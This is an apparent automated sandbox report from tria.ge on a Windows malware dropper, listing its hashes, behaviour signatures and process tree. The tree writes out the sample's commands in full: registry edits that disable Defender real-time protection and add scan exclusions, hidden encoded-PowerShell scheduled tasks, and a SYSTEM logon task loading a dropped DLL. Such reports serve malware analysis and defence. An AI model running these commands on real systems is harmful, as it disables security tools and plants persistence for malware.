Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
-
submitted
11/12/2023, 03:12
General
-
Target
e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
-
Size
7.2MB
-
MD5
ce3185730246203700a23e2bca796d99
-
SHA1
0df5c4d7f5352dbe6ffedf575282f09faedf788f
-
SHA256
e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8
-
SHA512
ce19257d2e6187e3071253b869f62dd119b52425ff58a46c8a644831d01d4652124f0323653a96703929b2a5bafcc2392d2102397cbf8cfc321e859126b8d8c2
-
SSDEEP
196608:91Orab2X1JKmRNu34cJcyd8/1cj+b3Y6pR0c9zw3Zzxaq:3Or2M1JKIuLJJdacw3Y6pR0cuf
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 40 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 9 IoCs
-
Drops file in Program Files directory 5 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe"C:\Users\Admin\AppData\Local\Temp\e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4663.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS49AD.tmp\Install.exe.\Install.exe /MmqydidDY "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggPxzAMra" /SC once /ST 00:02:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggPxzAMra"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggPxzAMra"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btngLezmYLEbkDGphz" /SC once /ST 03:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\NjIJeDk.exe\" Bp /Drsite_idNrT 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8D014434-B477-4C22-A981-D2762D984554} S-1-5-21-2084844033-2744876406-2053742436-1000:GGPVHMXR\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {A7BFDB3D-2986-443E-9685-144998B70F9D} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\NjIJeDk.exeC:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\NjIJeDk.exe Bp /Drsite_idNrT 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gThcjpGwI" /SC once /ST 00:47:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gThcjpGwI"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gThcjpGwI"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwliQqMVJ" /SC once /ST 00:19:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwliQqMVJ"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwliQqMVJ"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\zlCauFJzutozcZAJ\ygwFtFPI\oQviYWbBtuIQsPhh.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\zlCauFJzutozcZAJ\ygwFtFPI\oQviYWbBtuIQsPhh.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VYfzEhPxBNNTaEVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VYfzEhPxBNNTaEVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VYfzEhPxBNNTaEVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VYfzEhPxBNNTaEVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gikmPHWtX" /SC once /ST 02:09:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gikmPHWtX"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gikmPHWtX"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qxdnhmFGwPNMbPaLO" /SC once /ST 02:31:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\PzPPUFP.exe\" 6V /kusite_idiWV 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qxdnhmFGwPNMbPaLO"3⤵
-
-
-
C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\PzPPUFP.exeC:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\PzPPUFP.exe 6V /kusite_idiWV 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btngLezmYLEbkDGphz"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zYDdeyryU\FxDvaL.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VgITaIvscZwKwBA" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
338KB
MD5157c0da78999fb6a3b210778cf25214e
SHA17c1744093d41b8e99e0adcba7b1d52c25cc571e0
SHA256e97a0111685dd8a399a2aae55170768d906da953e4576a795a3284d34e6cc493
SHA512efd487705dfdcc7f94a8fda04da62d60dff60e7c6fb864e4b2dafa21777ef9fee8e17f1647a9d06d9e32b42799c9bfc7a4a7982323de3e874e8168de4fb2451c
-
Filesize
118KB
MD558d9c3e54649587ac0da372567ef81e9
SHA1e88c985c75cd2af16058710f3f21a9f555588d16
SHA2562f28b80d6d258f0cd56e38d6feb0c58df253123dbaff2d92a9dbdc68e7cb0810
SHA512c6fdb99c927d32399cb04d808661805f2f851b70a5082a1aac009cef3ce368ca5671348277f2982ded857a62636165ecf918a2fbd024e6c7962a3d7d57e9cc75
-
Filesize
2.2MB
MD599c8e1f95114bb15d116df3cedf4b1fd
SHA1e6b7e89dc4e7d2360e2b47e4eec8ac07fe74e236
SHA256660d672da3206f4c50be0dd75510cede5f1c9f9cf7e31720e6affbbbd7cabfd5
